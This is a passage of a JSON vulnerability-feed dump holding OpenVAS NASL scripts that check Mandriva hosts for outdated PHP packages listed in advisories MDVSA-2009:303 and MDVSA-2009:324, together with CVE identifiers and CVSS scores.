$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-03 22:10:42 +0100 (Thu, 03 Dec 2009)\");\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:303 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php\", rpm:\"apache-mod_php~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc\", rpm:\"php-apc~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc-admin\", rpm:\"php-apc-admin~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbx\", rpm:\"php-dbx~1.1.0~26.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dio\", rpm:\"php-dio~0.0.2~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator-admin\", rpm:\"php-eaccelerator-admin~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fam\", rpm:\"php-fam~5.0.1~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~1.0.4~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filepro\", rpm:\"php-filepro~5.1.6~17.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-idn\", rpm:\"php-idn~1.2b~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcal\", rpm:\"php-mcal~0.6~27.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-optimizer\", rpm:\"php-optimizer~0.1~0.alpha1.5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sasl\", rpm:\"php-sasl~0.1.0~25.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ssh2\", rpm:\"php-ssh2~0.11.0~2.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.29~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tclink\", rpm:\"php-tclink~3.4.4~10.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-translit\", rpm:\"php-translit~0.6.0~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-vld\", rpm:\"php-vld~0.9.1~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xattr\", rpm:\"php-xattr~1.1.0~6.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xdebug\", rpm:\"php-xdebug~2.0.5~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66420", "href": "http://plugins.openvas.org/nasl.php?oid=66420", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:324 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_324.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:324 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:324\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.\";\n\n \n\nif(description)\n{\n script_id(66420);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:324 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.4~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.4~3.6mdv2008.0\", 